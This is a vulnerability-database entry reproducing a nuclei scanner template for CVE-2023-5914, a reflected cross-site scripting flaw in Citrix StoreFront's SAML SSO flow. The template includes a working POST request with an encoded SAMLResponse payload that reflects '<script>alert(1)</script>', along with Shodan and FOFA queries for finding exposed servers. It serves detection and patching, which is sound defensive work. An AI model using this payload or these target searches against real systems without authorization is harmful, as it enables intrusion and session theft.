Citrix StoreFront - Cross-Site Scripting

02 Jul 2026 09:36:57 | Reported by ProjectDiscovery | Type: nuclei | Source: github.com | 93 Views

Citrix StoreFront - Reflected Cross-Site Scripting vulnerability exploitable without authentication, triggered by coercing an error message during XML parsing in the SSO flow.

Code
id: CVE-2023-5914

info:
  name: Citrix StoreFront - Cross-Site Scripting
  author: DhiyaneshDK
  severity: medium
  description: |
    Reflected Cross-Site Scripting issue which is exploitable without authentication. This vulnerability was exploitable through coercing an error message during an XML parsing procedure in the SSO flow.
  impact: |
    Unauthenticated attackers can inject malicious JavaScript via reflected XSS during XML parsing in the SSO flow, potentially stealing user credentials or session tokens.
  remediation: |
    Apply Citrix security updates immediately. Update to StoreFront versions 2402, 2203 CU1, 2203 LTSR CU5, 1912 LTSR CU8, or later.
  reference:
    - https://www.assetnote.io/resources/research/continuing-the-citrix-saga-cve-2023-5914-cve-2023-6184
    - https://support.citrix.com/article/CTX583759/citrix-storefront-security-bulletin-for-cve20235914
    - https://www.youtube.com/watch?v=t8MeUQrPqec
    - https://nvd.nist.gov/vuln/detail/CVE-2023-5914
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-5914
    cwe-id: CWE-79
    epss-score: 0.73142
    epss-percentile: 0.99387
    cpe: cpe:2.3:a:cloud:citrix_storefront:*:*:*:*:ltsr:*:*:*
  metadata:
    max-request: 1
    vendor: cloud
    product: citrix_storefront
    shodan-query:
      - html:"/Citrix/StoreWeb"
      - http.html:"/citrix/storeweb"
    fofa-query: body="/citrix/storeweb"
  tags: cve,xss,citrix,storefront,cve2023,cloud,vkev,vuln

http:
  - method: POST
    path:
      - "{{BaseURL}}/Citrix/teststoreAuth/SamlTest"
    headers:
      Content-Type: application/x-www-form-urlencoded
    body: "SAMLResponse=q1YKdvT1CUotLsjPK05VskLhBrhHlSVVOpkkhZebJRs7ZUQahVp6ZkYVp7iUVEUaexUkewTmRhkHmkeGV%2bQk5wXm%2bwZn5yZ5BJr7GPtlJefmlKc4R%2bWluBRnBmSVl0XlWpYFpNvaKtUCAA%3d%3d"

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "text/html")'
          - 'contains_all(body, "<script>alert(1)</script>", "XmlException")'
        condition: and
# digest: 4b0a00483046022100fe02365c1f6d60ed7879b016b55b1ca63e1ef51821d430200cb14abd5b1782c5022100c9af1d17453686abd61dd3c5220a0b3e840333b827b96748b32c5f393a81b2b6:922c64590222798bb761d5b6d8e72950


04 Feb 2026 07:00 (Current)
Vulners AI Score: 6.5 (Medium risk)
CVSS 3.1: 5.4 - 7.2
EPSS: 0.73142